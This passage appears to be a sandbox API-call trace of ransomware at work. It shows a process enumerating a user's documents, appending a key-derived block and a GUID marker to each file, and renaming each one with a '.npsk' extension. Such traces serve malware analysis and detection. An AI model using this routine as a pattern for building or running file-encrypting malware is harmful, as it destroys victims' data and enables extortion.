UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.835] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.835] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.835] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0216.836] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x74e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.836] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.836] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.836] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.836] CloseHandle (hObject=0x61c) returned 1 [0216.838] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.npsk")) returned 1 [0216.840] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0216.841] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.841] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.841] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.841] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\") returned="4qvrM0-cLvTuNo\\" [0216.841] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\") returned="y5VbixHYeFSBUXkYrU1j\\" [0216.841] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0216.841] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.841] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.841] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.841] PathFindFileNameW (pszPath="") returned="" [0216.841] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9d89230, ftCreationTime.dwHighDateTime=0x1d5d987, ftLastAccessTime.dwLowDateTime=0xe5fa3430, ftLastAccessTime.dwHighDateTime=0x1d5e611, ftLastWriteTime.dwLowDateTime=0xe5fa3430, ftLastWriteTime.dwHighDateTime=0x1d5e611, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.851] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9d89230, ftCreationTime.dwHighDateTime=0x1d5d987, ftLastAccessTime.dwLowDateTime=0xe5fa3430, ftLastAccessTime.dwHighDateTime=0x1d5e611, ftLastWriteTime.dwLowDateTime=0xe5fa3430, ftLastWriteTime.dwHighDateTime=0x1d5e611, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.851] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54b495e0, ftCreationTime.dwHighDateTime=0x1d5df01, ftLastAccessTime.dwLowDateTime=0x537e7c00, ftLastAccessTime.dwHighDateTime=0x1d5d910, ftLastWriteTime.dwLowDateTime=0x537e7c00, ftLastWriteTime.dwHighDateTime=0x1d5d910, nFileSizeHigh=0x0, nFileSizeLow=0x5c59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4F9yqJhqrDib3.odp", cAlternateFileName="4F9YQJ~1.ODP")) returned 1 [0216.851] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\4F9yqJhqrDib3.odp") returned=".odp" [0216.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\4F9yqJhqrDib3.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\4f9yqjhqrdib3.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.853] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=23641) returned 1 [0216.853] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.855] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5c33, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.855] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.857] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x5c59, lpOverlapped=0x0) returned 1 [0216.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.858] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.859] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.859] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.859] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.859] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.859] GetLastError () returned 0x0 [0216.860] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.860] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.860] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.860] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.860] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.860] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0216.861] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5c59, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.861] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.861] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.861] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.861] CloseHandle (hObject=0x61c) returned 1 [0216.862] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\4F9yqJhqrDib3.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\4f9yqjhqrdib3.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\4F9yqJhqrDib3.odp.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\4f9yqjhqrdib3.odp.npsk")) returned 1 [0216.864] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e4ab60, ftCreationTime.dwHighDateTime=0x1d5de4d, ftLastAccessTime.dwLowDateTime=0x8c446890, ftLastAccessTime.dwHighDateTime=0x1d5de49, ftLastWriteTime.dwLowDateTime=0x8c446890, ftLastWriteTime.dwHighDateTime=0x1d5de49, nFileSizeHigh=0x0, nFileSizeLow=0x1cb6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dsm4F7qTV773TQhJHdO.rtf", cAlternateFileName="DSM4F7~1.RTF")) returned 1 [0216.865] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\dsm4F7qTV773TQhJHdO.rtf") returned=".rtf" [0216.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\dsm4F7qTV773TQhJHdO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\dsm4f7qtv773tqhjhdo.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.866] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=7350) returned 1 [0216.866] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.868] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1c90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.868] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.870] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1cb6, lpOverlapped=0x0) returned 1 [0216.870] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.871] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.871] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.871] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.872] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.872] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.872] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.872] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.872] GetLastError () returned 0x0 [0216.872] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.872] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.872] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.872] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.872] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.872] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0216.873] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1cb6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.873] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.873] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.873] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.873] CloseHandle (hObject=0x61c) returned 1 [0216.875] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\dsm4F7qTV773TQhJHdO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\dsm4f7qtv773tqhjhdo.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\dsm4F7qTV773TQhJHdO.rtf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\dsm4f7qtv773tqhjhdo.rtf.npsk")) returned 1 [0216.877] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ea4dc20, ftCreationTime.dwHighDateTime=0x1d5e267, ftLastAccessTime.dwLowDateTime=0xb65b9890, ftLastAccessTime.dwHighDateTime=0x1d5da2c, ftLastWriteTime.dwLowDateTime=0xb65b9890, ftLastWriteTime.dwHighDateTime=0x1d5da2c, nFileSizeHigh=0x0, nFileSizeLow=0xa5e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JTG0e.xlsx", cAlternateFileName="JTG0E~1.XLS")) returned 1 [0216.877] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\JTG0e.xlsx") returned=".xlsx" [0216.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\JTG0e.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\jtg0e.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.877] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=42467) returned 1 [0216.877] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.879] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa5bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.879] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.881] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xa5e3, lpOverlapped=0x0) returned 1 [0216.882] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.882] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.882] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.882] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.883] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.883] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.883] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.884] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.884] GetLastError () returned 0x0 [0216.884] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.884] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.884] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.884] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.884] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.884] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0216.885] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa5e3, lpNewFilePointer=0x0, 